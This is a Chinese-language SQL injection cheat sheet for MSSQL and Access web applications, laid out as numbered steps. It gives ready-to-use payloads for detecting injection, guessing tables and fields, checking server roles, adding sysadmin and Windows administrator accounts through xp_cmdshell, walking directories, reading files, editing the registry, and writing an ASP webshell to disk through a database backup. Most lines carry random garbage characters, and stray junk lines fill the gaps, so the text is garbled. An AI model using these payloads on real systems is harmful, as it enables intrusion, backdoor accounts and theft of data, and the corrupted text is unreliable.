1.判断是否有注入;and 1=1 ;and 1=2 /Nns3��o�E
2.初步判断是否是mssql ;and user>0 |}Mt�hj9n�
�?K�G4�Z��
3.注入参数是字符'and [查询条件] and ''=' �~�(]�'ah,
��A��u"BDP
4.搜索时没过滤参数的'and [查询条件] and '%25'=' TGuCIc0B�{
t(1gJZs>kX
5.判断数据库系统 T��'��a��&
`a5,5}7v%`
;and (select count(*) from sysobjects)>0 mssql A�`1�-c���
R~BFZF>�:�
;and (select count(*) from msysobjects)>0 access _7<�G6q2(�
�{EJ��+
�
F�Tu<$`!1L
&Z%'x�AOGR
6.猜数据库 ;and (select Count(*) from [数据库名])>0 *1h�@J�b34
'j;i4ie>*x
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 \_�MWZRMc5
y\R�-=Am".
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �:PNhX2�F�
�vHN/~�k�#
9.(1)猜字段的ascii值(access) \�m(>�Q���
MbeK{8~E%l
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Z/LYTo$B�z
9Us'Q{CD �
(2)猜字段的ascii值(mssql) l $0w �9Z^
R�p
!Rzl<�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 lL�&p?MU�p
<7o@7r'0��
10.测试权限结构(mssql) c*",A�Z>�U
c=<^pCa9t1
2�]}�e4�@{
mh35S!I3I^
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- /w2N�O�9�Q
F41g�M��g
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- m�}t`43}QE
�Q}u�h`�?t
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- wsgT`M'J[
-BH T'zq1S
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \~.el�Kw<U
uFL!�*�#A
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- @%!G��j{��
�W�?0u�_F�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- H�k?�E0�.�
�-Fc 9mv(H
;and 1=(select IS_MEMBER('db_owner'));-- ���kfq<M7y
wrVR[�v>E<
syk,e4:o�A
NN~PWy1opa
11.添加mssql和系统的帐户 $�'�KhA6�u
caZEZk#r;
;exec master.dbo.sp_addlogin username;-- �GK��&R.R]
;exec master.dbo.sp_password null,username,password;-- �RQ,X0��pS
�W=4|�ahk$
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Lb��u,�V�X
Qm4cuV-0{�
;exec master.dbo.xp_cmdshell 'net user username password z5W;-�sC�z
|�T{ZD��J+
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 5#::��42oE
iOiXo6YE
;exec master.dbo.xp_cmdshell 'net user username password /add';-- X
[;n1�49o
�Tvw(S�q};
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �\3whM6t�K
�0�gr#<�(
5D>�c�bzP@
XQcE
��ZJ2
12.(1)遍历目录 S�9� @*g3�
5K00z?kD2V
;create table dirs(paths varchar(100), id int) Y{L|ja%9?�
��10����*^
;insert dirs exec master.dbo.xp_dirtree 'c:\' iBC�IJ!��;
V�,eH E5C�
;and (select top 1 paths from dirs)>0 �29NP!W
/g
Hr/J6�kyB)
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �2>im�'x 5
�MJ�.K�or
x)�T�07,3:
�U!T#'H5'-
(2)遍历目录 �kS_3��7-;
�3Z74&a�$�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- X
iM{YZ�`B
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 a�r�@ysBy�
uN��6xOq�/
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 u�R82},r$m
BA_l*h%=Cc
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 }t���e�d�h
7G_�O��FD
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 >2to�sxH M
��3,Bm"'b6
_? u�} Jy_
`;&=�m,
W'
13.mssql中的存储过程 �r�8!�M8Sc
+�N!/>w]n
xp_regenumvalues 注册表根键, 子键 #M�92=IH�
D$SO� 6X~�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #e6x���_o|
nG"Ae�8r��
xp_regread 根键,子键,键值名 k�_�1o�j[O
VqeW;8&*iv
;exec xp_regread c�Qh=�Mri]
s$VLV�T*6
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �D�kB��Vk+
b�fA�9��aT
xp_regwrite 根键,子键, 值名, 值类型, 值 �v9Ez0 �:)
b�M
$WU?Z
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 'Y5=A!*@tf
a0Q�\]S���
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Cv�qUaHW@�
KQ.�cd��]6
xp_regdeletevalue 根键,子键,值名 I�O?6F@�(�
�i�D2�>-yf
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 (�rSBzM]�H
�6d��YUMqQ
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 @m"��P_1`*
>{j�uw&�Uu
r�'u[�>uY
\fL��:�Ie�
14.mssql的backup创建webshell `�D��v��&.
a�4�N8zD�S
use model n:YA�4�t7S
'w}/�o�+x@
create table cmd(str image); &qZ�:"��k�
|*zv��aI(}
insert into cmd(str) values (''); �Q3x.�q��z
2L�H.I�f��
backup database model to disk='c:\l.asp'; i%9xt�1c_
��S;�S_<GX
���K|-RAjE
v�C5y]1QDd
15.mssql内置函数 eh$�T
3_#q
�,T7(!�)dR
;and (select @@version)>0 获得Windows的版本号 �b=���Y3�O
)n�UTux0K\
;and user_name()='dbo' 判断当前系统的连接用户是不是sa G�K:pt�8=�
���[T#�9#3
;and (select user_name())>0 爆当前系统的连接用户 M�hg_z�.Z�
L��@6T�~��
;and (select db_name())>0 得到当前连接的数据库 vm�"d�E4W=
F%�
�K}�&3
o�<%s�\n��
s��xQMf�bN
16.简洁的webshell )9>�E} SU/
MIwk�FI�8�
use model W�hR�'MkfL
AN-;*�n<'
create table cmd(str image); @KC;"�u'C�
#[Vk#BIiv8
insert into cmd(str) values (''); �pJ�]i)$�M
Mhz��e�!�!
backup database model to disk='g:\wwwtest\l.asp';
